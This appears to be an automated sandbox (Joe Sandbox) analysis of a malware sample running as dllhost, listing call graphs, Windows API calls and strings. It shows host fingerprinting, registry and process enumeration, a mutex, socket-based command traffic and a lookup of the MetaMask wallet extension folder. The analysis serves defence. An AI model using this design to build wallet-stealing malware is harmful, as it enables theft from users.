13466->13467 13466->13468 13467->13468 13469 329277f 13468->13469 13470 3292784 __stbuf 13469->13470 13485 32949fe 13470->13485 13472 329278f 13472->13419 13474 329ad71 13473->13474 13475 329ad80 13473->13475 13476 32959b3 __fptostr 66 API calls 13474->13476 13477 329ad9e 13475->13477 13478 32959b3 __fptostr 66 API calls 13475->13478 13481 329ad76 13476->13481 13477->13436 13479 329ad91 13478->13479 13480 3295961 __fptostr 11 API calls 13479->13480 13480->13481 13481->13436 13483 3294afd _LocaleUpdate::_LocaleUpdate 76 API calls 13482->13483 13484 329af62 13483->13484 13484->13455 13486 3294a0e 13485->13486 13487 3294a21 LeaveCriticalSection 13485->13487 13488 329a19f _doexit LeaveCriticalSection 13486->13488 13487->13472 13489 3294a1e 13488->13489 13489->13472 13495 32a76dd __write_nolock 13490->13495 13491 32920e4 __fltout2 5 API calls 13493 32a7874 13491->13493 13492 32a7700 select 13494 32a779e setsockopt CancelIo InterlockedExchange closesocket 13492->13494 13492->13495 13497 32a7854 SetEvent 13494->13497 13495->13492 13496 32a7747 _memset 13495->13496 13498 32a7799 13495->13498 13499 32a775a recv 13496->13499 13502 32a7460 13496->13502 13497->13498 13498->13491 13499->13496 13500 32a77fa setsockopt CancelIo InterlockedExchange closesocket 13499->13500 13500->13497 13503 32a74b9 13502->13503 13520 32a7ba0 13503->13520 13505 32920e4 __fltout2 5 API calls 13507 32a76c5 13505->13507 13506 32a7669 13508 3293c0e __CxxThrowException@8 RaiseException 13506->13508 13507->13495 13509 32a7684 ___DllMainCRTStartup 13508->13509 13542 32a6ef0 setsockopt CancelIo InterlockedExchange closesocket SetEvent 13509->13542 13511 32a74c7 _memcpy_s ___DllMainCRTStartup 13511->13506 13515 32a7589 13511->13515 13516 32a7c80 70 API calls 13511->13516 13518 32a75e0 VirtualFree 13511->13518 13519 32a7ba0 70 API calls 13511->13519 13529 32a7c80 13511->13529 13538 32a6ff0 13511->13538 13512 32a76a2 13512->13495 13514 32a7554 wsprintfA 13514->13511 13515->13505 13516->13511 13518->13511 13519->13511 13521 32a7bb8 13520->13521 13522 32a7bb0 13520->13522 13523 3292470 __floor_pentium4 68 API calls 13521->13523 13522->13511 13524 32a7bdb VirtualAlloc 13523->13524 13525 32a7c1b 13524->13525 13526 32a7c24 _memcpy_s 13524->13526 13525->13511 13527 32a7c5e 13526->13527 13528 32a7c4c VirtualFree 13526->13528 13527->13511 13528->13527 13530 32a7c8f 13529->13530 13531 32a7c98 _memcpy_s _memmove 13529->13531 13530->13514 13532 32a7cfb 13531->13532 13533 32a7ceb 13531->13533 13534 32a7ac0 70 API calls 13532->13534 13535 32a7ac0 70 API calls 13533->13535 13536 32a7d05 13534->13536 13537 32a7cf2 13535->13537 13536->13514 13537->13514 13539 32a7021 _memset 13538->13539 13540 32920e4 __fltout2 5 API calls 13539->13540 13541 32a708e 13540->13541 13541->13511 13542->13512 13544 3297010 _memset 13543->13544 13545 32a3876 GetVersionExA 13544->13545 13546 32a389b _strncpy 13545->13546 13547 32920e4 __fltout2 5 API calls 13546->13547 13548 32a39c0 LoadLibraryA GetProcAddress GetProcAddress 13547->13548 13548->13329 13550 32a380c 13549->13550 13551 32920e4 __fltout2 5 API calls 13550->13551 13552 32a383d 13551->13552 13553 32a3e00 13552->13553 13554 32a3e18 _memset 13553->13554 13555 32a3e8b 13554->13555 13558 32a3e45 lstrcatA lstrcatA 13554->13558 13578 32a3340 CreateToolhelp32Snapshot 13554->13578 13557 32a3ea1 lstrcatA 13555->13557 13559 32a3eb1 13555->13559 13557->13559 13558->13554 13559->13559 13560 3291e50 77 API calls 13559->13560 13561 32a3ed8 13560->13561 13561->13335 13563 32a3d51 _memset 13562->13563 13564 32a4a70 ___DllMainCRTStartup 16 API calls 13563->13564 13565 32a3d7d lstrlenA 13564->13565 13566 32a3d8e lstrcpyA 13565->13566 13568 32920e4 __fltout2 5 API calls 13566->13568 13569 32a3db3 13568->13569 13569->13337 13571 32a3658 _memset 13570->13571 13572 32930b7 _strtok 66 API calls 13571->13572 13574 32a3669 13572->13574 13573 32a368b lstrcpyA 13575 32920e4 __fltout2 5 API calls 13573->13575 13574->13573 13576 32930b7 _strtok 66 API calls 13574->13576 13577 32a36a7 wsprintfA 13575->13577 13576->13574 13577->13345 13579 32928ee ___DllMainCRTStartup 77 API calls 13578->13579 13580 32a3363 13579->13580 13581 32a336c 13580->13581 13582 32a3372 Process32First 13580->13582 13581->13554 13583 32a33d4 CloseHandle 13582->13583 13584 32a3384 lstrcmpiA 13582->13584 13585 32a33e1 ctype 13583->13585 13586 32a339f Process32Next 13584->13586 13587 32a3397 13584->13587 13585->13554 13586->13587 13588 32a33ab 13586->13588 13587->13583 13589 32a33b0 lstrcmpiA 13588->13589 13589->13587 13590 32a33bf Process32Next 13589->13590 13590->13587 13590->13589 13592 32944d8 __getptd 66 API calls 13591->13592 13593 329267e 13592->13593 13593->13377 13595 32a6e3f 13594->13595 13596 32a6e96 13594->13596 13598 32a6ed3 LeaveCriticalSection 13595->13598 13600 32a6e42 send 13595->13600 13603 32a6e73 Sleep 13595->13603 13597 32a6e9c 13596->13597 13596->13598 13599 32a6ea0 send 13597->13599 13598->13392 13601 32a6ebd Sleep 13599->13601 13604 32a6ecb 13599->13604 13600->13595 13602 32a6e60 Sleep 13600->13602 13601->13599 13601->13604 13602->13595 13602->13600 13603->13595 13603->13596 13604->13598 13605->13396 13657 32a2708 13658 32944d8 __getptd 66 API calls 13657->13658 13659 32a2710 13658->13659 13664 32a240c 13659->13664 13661 32a2760 13674 32a2795 13661->13674 13663 32a2781 ___lock_fhandle 13665 32a2418 ___lock_fhandle 13664->13665 13666 32944d8 __getptd 66 API calls 13665->13666 13672 32a2438 __CallSettingFrame@12 13666->13672 13667 32a24a9 13689 32a24ce 13667->13689 13671 32a24bf ___lock_fhandle 13671->13661 13672->13667 13683 329c6bd 13672->13683 13673 329c6bd ___FrameUnwindToState 69 API calls 13673->13671 13738 32a227a 13674->13738 13677 32944d8 __getptd 66 API calls 13678 32a27a9 13677->13678 13679 32944d8 __getptd 66 API calls 13678->13679 13680 32a27b7 13679->13680 13682 32a27fa FindHandler 13680->13682 13746 32a2253 13680->13746 13682->13663 13694 3295a00 13683->13694 13685 329c6c9 DecodePointer 13686 329c6d9 13685->13686 13695 329c671 13686->13695 13690 32944d8 __getptd 66 API calls 13689->13690 13691 32a24d3 13690->13691 13692 32a24b5 13691->13692 13693 32944d8 __getptd 66 API calls 13691->13693 13692->13671 13692->13673 13693->13692 13694->13685 13696 329c67d ___lock_fhandle 13695->13696 13697 32944d8 __getptd 66 API calls 13696->13697 13698 329c682 13697->13698 13701 329ea89 13698->13701 13710 329c75b DecodePointer 13701->13710 13703 329ea8e 13704 329ea99 13703->13704 13711 329c768 13703->13711 13706 329eab1 13704->13706 13708 32957e6 __call_reportfault 8 API calls 13704->13708 13707 3297602 _raise 66 API calls 13706->13707 13709 329eabb 13707->13709 13708->13706 13710->13703 13714 329c774 ___lock_fhandle 13711->13714 13712 329c7cf 13715 329c7b1 DecodePointer 13712->13715 13718 329c7de 13712->13718 13713 329c79b 13716 329445f __getptd_noexit 66 API calls 13713->13716 13714->13712 13714->13713 13714->13715 13720 329c797 13714->13720 13721 329c7a0 _siglookup 13715->13721 13716->13721 13719 32959b3 __fptostr 66 API calls 13718->13719 13722 329c7e3 13719->13722 13720->13713 13720->13718 13723 329c83b 13721->13723 13724 329c7a9 ___lock_fhandle 13721->13724 13726 3297602 _raise 66 API calls 13721->13726 13725 3295961 __fptostr 11 API calls 13722->13725 13727 329a278 __lock 66 API calls 13723->13727 13728 329c846 13723->13728 13724->13704 13725->13724 13726->13723 13727->13728 13730 329c87b 13728->13730 13732 3294328 EncodePointer 13728->13732 13733 329c8cf 13730->13733 13732->13730 13734 329c8dc 13733->13734 13735 329c8d5 13733->13735 13734->13724 13737 329a19f LeaveCriticalSection 13735->13737 13737->13734 13739 32944d8 __getptd 66 API calls 13738->13739 13740 32a2285 13739->13740 13741 32a2290 13740->13741 13742 32a22a1 13740->13742 13744 32944d8 __getptd 66 API calls 13741->13744 13743 32944d8 __getptd 66 API calls 13742->13743 13745 32a2295 13743->13745 13744->13745 13745->13677 13747 32944d8 __getptd 66 API calls 13746->13747 13748 32a225d 13747->13748 13748->13682

                    Control-flow Graph

                    APIs
                    • _memset.LIBCMT ref: 032A4064
                    • _strncpy.LIBCMT ref: 032A4081
                    • inet_addr.WS2_32(?), ref: 032A408D
                      • Part of subcall function 032A4E40: _memset.LIBCMT ref: 032A4E5F
                      • Part of subcall function 032A4E40: _memset.LIBCMT ref: 032A4E79
                      • Part of subcall function 032A4E40: GetComputerNameA.KERNEL32(00000000,?), ref: 032A4E99
                      • Part of subcall function 032A4E40: lstrcpyA.KERNEL32(00000000,UnKnow), ref: 032A4EAF
                      • Part of subcall function 032A4E40: _memset.LIBCMT ref: 032A4EC3
                      • Part of subcall function 032A4E40: wsprintfA.USER32 ref: 032A4EDB
                    • gethostname.WS2_32(?,00000032), ref: 032A40BC
                    • _strncpy.LIBCMT ref: 032A40CC
                    • LoadLibraryA.KERNEL32(kernel32.dll,?,?,?,?,?,?,762323A0,?), ref: 032A40E4
                    • GetProcAddress.KERNEL32(00000000,IsWow64Process), ref: 032A4102
                    • GetProcAddress.KERNEL32(00000000,GetCurrentProcess), ref: 032A410C
                    • FreeLibrary.KERNEL32(00000000,?,?,?,?,?,?,762323A0), ref: 032A4125
                    • _strncpy.LIBCMT ref: 032A4196
                    • _strncpy.LIBCMT ref: 032A41AD
                    • GetTickCount.KERNEL32 ref: 032A41B5
                    • wsprintfA.USER32 ref: 032A4208
                    • _strncpy.LIBCMT ref: 032A4221
                    • _strncpy.LIBCMT ref: 032A4268
                    • _memset.LIBCMT ref: 032A4285
                    • wsprintfA.USER32 ref: 032A429F
                    • _strncpy.LIBCMT ref: 032A42D0
                      • Part of subcall function 03291AA0: std::_Xinvalid_argument.LIBCPMT ref: 03291AB6
                    • GetFileAttributesA.KERNELBASE(00000000), ref: 032A42E1
                    • lstrcpyA.KERNEL32(?,032ABDD0), ref: 032A42FC
                    Strings
                    • GetCurrentProcess, xrefs: 032A4104
                    • C:\Users\%s\AppData\Local\Google\Chrome\User Data\Default\Extensions\nkbihfbeogaeaoehlefnkodbefgpgknn\, xrefs: 032A4299
                    • Time, xrefs: 032A420F
                    • IsWow64Process, xrefs: 032A40F2
                    • kernel32.dll, xrefs: 032A40DF
                    • Remark, xrefs: 032A4093
                    Memory Dump Source
                    • Source File: 00000008.00000002.4691434361.0000000003290000.00000040.00000400.00020000.00000000.sdmp, Offset: 03290000, based on PE: true
                    • Associated: 00000008.00000002.4691434361.00000000032B3000.00000040.00000400.00020000.00000000.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_8_2_3290000_dllhost.jbxd
                    Similarity
                    • API ID: _strncpy$_memset$wsprintf$AddressLibraryProclstrcpy$AttributesComputerCountFileFreeLoadNameTickXinvalid_argumentgethostnameinet_addrstd::_
                    • String ID: C:\Users\%s\AppData\Local\Google\Chrome\User Data\Default\Extensions\nkbihfbeogaeaoehlefnkodbefgpgknn\$GetCurrentProcess$IsWow64Process$Remark$Time$kernel32.dll
                    • API String ID: 2267238800-354951080
                    • Opcode ID: 6053a23a76e8f585c0aa3ac38dd4c424b89d4b0fbbcb56cd9804d55ff0d8f81f
                    • Instruction ID: 29682acf9112c4357c8a5490adf6923251fac26c098f7ad7f3320a6f51d407eb
                    • Opcode Fuzzy Hash: 6053a23a76e8f585c0aa3ac38dd4c424b89d4b0fbbcb56cd9804d55ff0d8f81f
                    • Instruction Fuzzy Hash: AA811975D10718ABDB24FB6CAC45BEEB778AB44700F0441A9E609A7241DBB09EC4CF95

                    Control-flow Graph

                    APIs
                    • _memset.LIBCMT ref: 032A4AD6
                    • _memset.LIBCMT ref: 032A4AE9
                    • _memset.LIBCMT ref: 032A4AFC
                    • LoadLibraryA.KERNEL32(ADVAPI32.dll,?,?,?,?,?,1D2AA39B,?,Enable,?), ref: 032A4B09
                    • GetProcAddress.KERNEL32(00000000,RegQueryValueExA), ref: 032A4B23
                    • GetProcAddress.KERNEL32(00000000,RegOpenKeyExA), ref: 032A4B31
                    • GetProcAddress.KERNEL32(00000000,RegEnumValueA), ref: 032A4B3F
                    • GetProcAddress.KERNEL32(00000000,RegEnumKeyExA), ref: 032A4B47
                    • GetProcAddress.KERNEL32(00000000,RegCloseKey), ref: 032A4B4F
                    • RegOpenKeyExA.KERNELBASE(?,?,00000000,00020019,?,?,?,?,?,?,1D2AA39B,?,Enable,?), ref: 032A4B7C
                    • FreeLibrary.KERNEL32(00000000,?,?,?,?,?,1D2AA39B,?,Enable,?), ref: 032A4D13
                    Strings
                    Memory Dump Source
                    • Source File: 00000008.00000002.4691434361.0000000003290000.00000040.00000400.00020000.00000000.sdmp, Offset: 03290000, based on PE: true
                    • Associated: 00000008.00000002.4691434361.00000000032B3000.00000040.00000400.00020000.00000000.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_8_2_3290000_dllhost.jbxd
                    Similarity
                    • API ID: AddressProc$_memset$Library$FreeLoadOpen
                    • String ID: %08X$ADVAPI32.dll$Enable$RegCloseKey$RegEnumKeyExA$RegEnumValueA$RegOpenKeyExA$RegQueryValueExA
                    • API String ID: 1822379937-990719231
                    • Opcode ID: 8ae418be32c6289f97d50a6ca4eb410973d54a1c623b3ba56ccb94f5ec9b31d4
                    • Instruction ID: 1b95088754161a863a25fc3c4b12ff866d1fd5599bda0a527514751139d1731b
                    • Opcode Fuzzy Hash: 8ae418be32c6289f97d50a6ca4eb410973d54a1c623b3ba56ccb94f5ec9b31d4
                    • Instruction Fuzzy Hash: F5713171A10719AFDB20EF59DC89FEEB7BCBB48700F0045D9E519A6241DBB09A84CF51

                    Control-flow Graph

                    APIs
                      • Part of subcall function 032A4E40: _memset.LIBCMT ref: 032A4E5F
                      • Part of subcall function 032A4E40: _memset.LIBCMT ref: 032A4E79
                      • Part of subcall function 032A4E40: GetComputerNameA.KERNEL32(00000000,?), ref: 032A4E99
                      • Part of subcall function 032A4E40: lstrcpyA.KERNEL32(00000000,UnKnow), ref: 032A4EAF
                      • Part of subcall function 032A4E40: _memset.LIBCMT ref: 032A4EC3
                      • Part of subcall function 032A4E40: wsprintfA.USER32 ref: 032A4EDB
                    • OutputDebugStringA.KERNEL32(Blocked,?,?), ref: 032A4716
                    • ExitProcess.KERNEL32 ref: 032A471E
                    • lstrlenA.KERNEL32(00000000,?,?), ref: 032A472F
                    • __time64.LIBCMT ref: 032A4740
                    • __localtime64.LIBCMT ref: 032A474C
                    • _memset.LIBCMT ref: 032A4768
                    • wsprintfA.USER32 ref: 032A4794
                    • CreateMutexA.KERNELBASE(00000000,00000000,MaticYoyox,?,?), ref: 032A47B6
                    • GetLastError.KERNEL32(?,?), ref: 032A47BE
                    • CloseHandle.KERNEL32(00000000,?,?), ref: 032A47CC
                    Strings
                    Memory Dump Source
                    • Source File: 00000008.00000002.4691434361.0000000003290000.00000040.00000400.00020000.00000000.sdmp, Offset: 03290000, based on PE: true
                    • Associated: 00000008.00000002.4691434361.00000000032B3000.00000040.00000400.00020000.00000000.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_8_2_3290000_dllhost.jbxd
                    Similarity
                    • API ID: _memset$wsprintf$CloseComputerCreateDebugErrorExitHandleLastMutexNameOutputProcessString__localtime64__time64lstrcpylstrlen
                    • String ID: %d-%d-%d %d:%d$Blocked$CopyC$Enable$False$MaticYoyox$Time
                    • API String ID: 2009633151-763860070
                    • Opcode ID: 519eda2794e8506d8020a46493d2b20c79a2b721a1422e24ed2ed7fe03dfeecd
                    • Instruction ID: b09692eca7ed7ee9d6e9bfd3dac0b808047a7d290159a79d4f6b483bf9f5254c
                    • Opcode Fuzzy Hash: 519eda2794e8506d8020a46493d2b20c79a2b721a1422e24ed2ed7fe03dfeecd
                    • Instruction Fuzzy Hash: 93514C75920B149FDB20F769FC48B9A73B8AF44310F148599E919D7241DBB099C4CBA1

                    Control-flow Graph

                    APIs
                      • Part of subcall function 032A7150: WSAStartup.WS2_32(00000202,?), ref: 032A71A1
                      • Part of subcall function 032A7150: InitializeCriticalSection.KERNEL32(?), ref: 032A71AE
                      • Part of subcall function 032A7150: CreateEventA.KERNEL32(00000000,00000001,00000000,00000000), ref: 032A71B9
                      • Part of subcall function 032A7150: __time64.LIBCMT ref: 032A71DC
                    • GetTickCount.KERNEL32 ref: 032A43C6
                      • Part of subcall function 032A7880: ResetEvent.KERNEL32(?,762323A0,?,?), ref: 032A78A3
                      • Part of subcall function 032A7880: socket.WS2_32 ref: 032A78B6
                    • Sleep.KERNEL32(0000EA60,00000000), ref: 032A4405
                    • CreateEventA.KERNEL32(00000000,00000001,00000000,00000000,00000000), ref: 032A443E
                    • _memset.LIBCMT ref: 032A4469
                    • _strncpy.LIBCMT ref: 032A447F
                    • GetTickCount.KERNEL32 ref: 032A44A4
                    • GetTickCount.KERNEL32 ref: 032A44B5
                    • setsockopt.WS2_32 ref: 032A44F1
                    • CancelIo.KERNEL32(?), ref: 032A44FF
                    • InterlockedExchange.KERNEL32(?,00000000), ref: 032A450F
                    • closesocket.WS2_32(?), ref: 032A451D
                    • SetEvent.KERNEL32(?), ref: 032A452B
                    • Sleep.KERNEL32 ref: 032A4547
                    • Sleep.KERNEL32(00000BB8), ref: 032A4561
                    • CloseHandle.KERNEL32(?), ref: 032A457A
                    • GetTickCount.KERNEL32 ref: 032A469C
                    Memory Dump Source
                    • Source File: 00000008.00000002.4691434361.0000000003290000.00000040.00000400.00020000.00000000.sdmp, Offset: 03290000, based on PE: true
                    • Associated: 00000008.00000002.4691434361.00000000032B3000.00000040.00000400.00020000.00000000.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_8_2_3290000_dllhost.jbxd
                    Similarity
                    • API ID: CountEventTick$Sleep$Create$CancelCloseCriticalExchangeHandleInitializeInterlockedResetSectionStartup__time64_memset_strncpyclosesocketsetsockoptsocket
                    • String ID:
                    • API String ID: 2471061221-0
                    • Opcode ID: 68d3dfda636c039d07add5f5f3be4f81af08b34fc83b9565b7a8084d74fb60ed
                    • Instruction ID: 933b86bfe0da2f089dcea04d7279bdd68f6cf6912383d0d6b7e3473067bc2216
                    • Opcode Fuzzy Hash: 68d3dfda636c039d07add5f5f3be4f81af08b34fc83b9565b7a8084d74fb60ed
                    • Instruction Fuzzy Hash: 1481DF715187819FD734EF69E884BDFB7E4AF88704F04891DE68997280DBB09584CB92

                    Control-flow Graph

                    APIs
                      • Part of subcall function 032A6EF0: setsockopt.WS2_32(000000FF,0000FFFF,00000080,?,00000004), ref: 032A6F12
                      • Part of subcall function 032A6EF0: CancelIo.KERNEL32(000000FF,?,032A70BF,762323A0,?,032A46B5), ref: 032A6F1F
                      • Part of subcall function 032A6EF0: InterlockedExchange.KERNEL32(00000000,00000000), ref: 032A6F2E
                      • Part of subcall function 032A6EF0: closesocket.WS2_32(000000FF), ref: 032A6F3B
                      • Part of subcall function 032A6EF0: SetEvent.KERNEL32(?,?,032A70BF,762323A0,?,032A46B5), ref: 032A6F48
                    • ResetEvent.KERNEL32(?,762323A0,?,?), ref: 032A78A3
                    • socket.WS2_32 ref: 032A78B6
                    • gethostbyname.WS2_32(?), ref: 032A78DD
                    • htons.WS2_32(?), ref: 032A78F6
                    • inet_ntoa.WS2_32(?), ref: 032A7911
                    • _wprintf.LIBCMT ref: 032A7919
                    • connect.WS2_32(?,?,00000010), ref: 032A792E
                    • getsockname.WS2_32(?,?,?), ref: 032A795D
                    • _memset.LIBCMT ref: 032A796E
                    • inet_ntoa.WS2_32(?), ref: 032A797A
                    • wsprintfA.USER32 ref: 032A797E
                    • setsockopt.WS2_32(?,0000FFFF,00000008,?,00000004), ref: 032A79A3
                    • WSAIoctl.WS2_32(?,98000004,?,0000000C,00000000,00000000,?,00000000,00000000), ref: 032A79D8
                    • CreateThread.KERNELBASE ref: 032A79F3
                    Memory Dump Source
                    • Source File: 00000008.00000002.4691434361.0000000003290000.00000040.00000400.00020000.00000000.sdmp, Offset: 03290000, based on PE: true
                    • Associated: 00000008.00000002.4691434361.00000000032B3000.00000040.00000400.00020000.00000000.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_8_2_3290000_dllhost.jbxd
                    Similarity
                    • API ID: Eventinet_ntoasetsockopt$CancelCreateExchangeInterlockedIoctlResetThread_memset_wprintfclosesocketconnectgethostbynamegetsocknamehtonssocketwsprintf
                    • String ID:
                    • API String ID: 628104682-0
                    • Opcode ID: be2426fb80b4d15de9aeb2170eba5bc65fd056b875e77fa09df8e29e9e37fc38
                    • Instruction ID: 8bf2f59192f3d0e2ed07dd78db97473b756c7c34f0d12ff7911eaa65977066a5
                    • Opcode Fuzzy Hash: be2426fb80b4d15de9aeb2170eba5bc65fd056b875e77fa09df8e29e9e37fc38
                    • Instruction Fuzzy Hash: E0415F71940708AFD750EBA8E889FEEB7B9EF48710F108519F519E7280DB706984CB61

                    Control-flow Graph

                    APIs
                    • select.WS2_32(00000000,?,00000000), ref: 032A7738
                    • _memset.LIBCMT ref: 032A7755
                    • recv.WS2_32(?,?,00002000,00000000), ref: 032A7772
                    • setsockopt.WS2_32 ref: 032A77C2
                    • CancelIo.KERNEL32(?), ref: 032A77CF
                    • InterlockedExchange.KERNEL32(00000000,00000000), ref: 032A77DE
                    • closesocket.WS2_32(?), ref: 032A77EB
                    • setsockopt.WS2_32 ref: 032A781E
                    • CancelIo.KERNEL32(?), ref: 032A782B
                    • InterlockedExchange.KERNEL32(?,00000000), ref: 032A783A
                    • closesocket.WS2_32(?), ref: 032A7847
                      • Part of subcall function 032A7460: wsprintfA.USER32 ref: 032A7564
                    • SetEvent.KERNEL32(?), ref: 032A7854
                    Memory Dump Source
                    • Source File: 00000008.00000002.4691434361.0000000003290000.00000040.00000400.00020000.00000000.sdmp, Offset: 03290000, based on PE: true
                    • Associated: 00000008.00000002.4691434361.00000000032B3000.00000040.00000400.00020000.00000000.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_8_2_3290000_dllhost.jbxd
                    Similarity
                    • API ID: CancelExchangeInterlockedclosesocketsetsockopt$Event_memsetrecvselectwsprintf
                    • String ID:
                    • API String ID: 1886666018-0
                    • Opcode ID: 2f13f6f90e894cd09e33f7b912994ee65d0fa90b7d5b70ad27b4db27cf2a7543
                    • Instruction ID: 67b9a0b129d8d766e87c4b1e89464de8598ee8723dfb781b2ba295f7140e15d6
                    • Opcode Fuzzy Hash: 2f13f6f90e894cd09e33f7b912994ee65d0fa90b7d5b70ad27b4db27cf2a7543
                    • Instruction Fuzzy Hash: 07419271650308ABEB50DFA8DC88FE57779BB08700F0485A4EA099E2C5DB7095C8CF61

                    Control-flow Graph

                    APIs
                    Strings
                    Memory Dump Source
                    • Source File: 00000008.00000002.4691434361.0000000003290000.00000040.00000400.00020000.00000000.sdmp, Offset: 03290000, based on PE: true
                    • Associated: 00000008.00000002.4691434361.00000000032B3000.00000040.00000400.00020000.00000000.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_8_2_3290000_dllhost.jbxd
                    Similarity
                    • API ID: _memset$ComputerNamelstrcpywsprintf
                    • String ID: Enable$SOFTWARE\%s\$UnKnow
                    • API String ID: 1685617284-1753358750
                    • Opcode ID: 0c117518f452838524e02c6dc9162469c323cf422bcdc192c9fffb75947b36c3
                    • Instruction ID: 32ecf723b6c1e3299bcb77017b16e77515f009d312011f0ec83256851ebe3e04
                    • Opcode Fuzzy Hash: 0c117518f452838524e02c6dc9162469c323cf422bcdc192c9fffb75947b36c3
                    • Instruction Fuzzy Hash: E011E7B5AA030CABEB20EB58DC4AFDE73789B44700F0084D5E304AA181EBB16BD4CB54

                    Control-flow Graph

                    • Executed
                    • Not Executed
                    control_flow_graph 249 32a3620-32a3670 SHGetSpecialFolderPathA call 3297010 call 32930b7 254 32a368b-32a36aa lstrcpyA call 32920e4 249->254 255 32a3672-32a3675 249->255 255->254 256 32a3677-32a3689 call 32930b7 255->256 256->254 256->255
                    APIs
                    • SHGetSpecialFolderPathA.SHELL32(00000000,?,00000007,00000000,Time), ref: 032A3641
                    • _memset.LIBCMT ref: 032A3653
                    • _strtok.LIBCMT ref: 032A3664
                      • Part of subcall function 032930B7: __getptd.LIBCMT ref: 032930D5
                    • _strtok.LIBCMT ref: 032A367F
                    • lstrcpyA.KERNEL32(user,00000000), ref: 032A3691
                    Strings
                    Memory Dump Source
                    • Source File: 00000008.00000002.4691434361.0000000003290000.00000040.00000400.00020000.00000000.sdmp, Offset: 03290000, based on PE: true
                    • Associated: 00000008.00000002.4691434361.00000000032B3000.00000040.00000400.00020000.00000000.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_8_2_3290000_dllhost.jbxd
                    Similarity
                    • API ID: _strtok$FolderPathSpecial__getptd_memsetlstrcpy
                    • String ID: Time$user
                    • API String ID: 3045899276-4045029352
                    • Opcode ID: 5aee336cf134853df3608cde9dfc392507d49bf379a154c5a91c51bb4c5aefc7
                    • Instruction ID: 593c50f1fc69773f6164d97d79a9ebda20818fed05346eef6851a1101b334f6a
                    • Opcode Fuzzy Hash: 5aee336cf134853df3608cde9dfc392507d49bf379a154c5a91c51bb4c5aefc7
                    • Instruction Fuzzy Hash: D601F938AA0709BBEA60F6686C0AFEE77789F14F40F414055EB45AA1C0EB915AC4C696

                    Control-flow Graph

                    • Executed
                    • Not Executed
                    control_flow_graph 261 32a3340-32a336a CreateToolhelp32Snapshot call 32928ee 264 32a336c-32a3371 261->264 265 32a3372-32a3382 Process32First 261->265 266 32a33d4-32a33dc CloseHandle call 32920f3 265->266 267 32a3384-32a3395 lstrcmpiA 265->267 271 32a33e1-32a33ec 266->271 269 32a339f-32a33a9 Process32Next 267->269 270 32a3397-32a339d 267->270 272 32a33d3 269->272 273 32a33ab 269->273 270->272 272->266 274 32a33b0-32a33bd lstrcmpiA 273->274 275 32a33bf-32a33c9 Process32Next 274->275 276 32a33cd-32a33d0 274->276 275->274 277 32a33cb 275->277 276->272 277->272
                    APIs
                    • CreateToolhelp32Snapshot.KERNEL32(00000002,00000000,032AF5F0,00000000,?,?,032A3E3E), ref: 032A3351
                      • Part of subcall function 032928EE: _malloc.LIBCMT ref: 03292908
                    • Process32First.KERNEL32(00000000,00000000), ref: 032A337A
                    • lstrcmpiA.KERNEL32(00000024,?), ref: 032A338D
                    • CloseHandle.KERNELBASE(00000000), ref: 032A33D5
                    Memory Dump Source
                    • Source File: 00000008.00000002.4691434361.0000000003290000.00000040.00000400.00020000.00000000.sdmp, Offset: 03290000, based on PE: true
                    • Associated: 00000008.00000002.4691434361.00000000032B3000.00000040.00000400.00020000.00000000.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_8_2_3290000_dllhost.jbxd
                    Similarity
                    • API ID: CloseCreateFirstHandleProcess32SnapshotToolhelp32_malloclstrcmpi
                    • String ID:
                    • API String ID: 2970433402-0
                    • Opcode ID: bf9f1f76c4909c68164d5534785903a28533fa44091a77c9248fbe2aa36ee874
                    • Instruction ID: 578281f63779cbdd1dcb4cf33fe4f1bc66b6f9d8053031efb0af83991d1cd4b3
                    • Opcode Fuzzy Hash: bf9f1f76c4909c68164d5534785903a28533fa44091a77c9248fbe2aa36ee874
                    • Instruction Fuzzy Hash: 94119A35615709E7D710EF5AEC48BAF776CEF417A1F088459FA05C6100EB749980D7E1

                    Control-flow Graph

                    APIs
                    • EnterCriticalSection.KERNEL32(76232460,76938400,032AB814), ref: 032A7294
                    • VirtualFree.KERNELBASE(?,00000000,00008000), ref: 032A72AD
                    • _rand.LIBCMT ref: 032A72BC
                    • wsprintfA.USER32 ref: 032A7331
                    • LeaveCriticalSection.KERNEL32(?,?,?), ref: 032A7436
                    Memory Dump Source
                    • Source File: 00000008.00000002.4691434361.0000000003290000.00000040.00000400.00020000.00000000.sdmp, Offset: 03290000, based on PE: true
                    • Associated: 00000008.00000002.4691434361.00000000032B3000.00000040.00000400.00020000.00000000.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_8_2_3290000_dllhost.jbxd
                    Similarity
                    • API ID: CriticalSection$EnterFreeLeaveVirtual_randwsprintf
                    • String ID:
                    • API String ID: 54394521-0
                    • Opcode ID: 9a9380250c9acd2b7fc742f01001b5642661251bcfc5d339d5b9670283957ec7
                    • Instruction ID: f589524fdf8bdb1d54b62426fecc77a09d54d00c7aaace87e91e02ede0cd0c12
                    • Opcode Fuzzy Hash: 9a9380250c9acd2b7fc742f01001b5642661251bcfc5d339d5b9670283957ec7
                    • Instruction Fuzzy Hash: 8E51A471A10A16AFDB15DF6DC8849AAF7A8BF44314F048669E819DB200DB30F995CB94

                    Control-flow Graph

                    • Executed
                    • Not Executed
                    control_flow_graph 329 32a3e00-32a3e2d call 3297010 call 3292590 334 32a3e8b-32a3e9f call 3292590 329->334 335 32a3e2f-32a3e34 329->335 341 32a3eb1-32a3eb9 334->341 342 32a3ea1-32a3eab lstrcatA 334->342 337 32a3e36-32a3e39 call 32a3340 335->337 340 32a3e3e-32a3e43 337->340 343 32a3e65-32a3e89 call 3292590 340->343 344 32a3e45-32a3e63 lstrcatA * 2 340->344 345 32a3ec0-32a3ec5 341->345 342->341 343->334 343->337 344->343 345->345 347 32a3ec7-32a3edc call 3291e50 345->347
                    APIs
                    • _memset.LIBCMT ref: 032A3E13
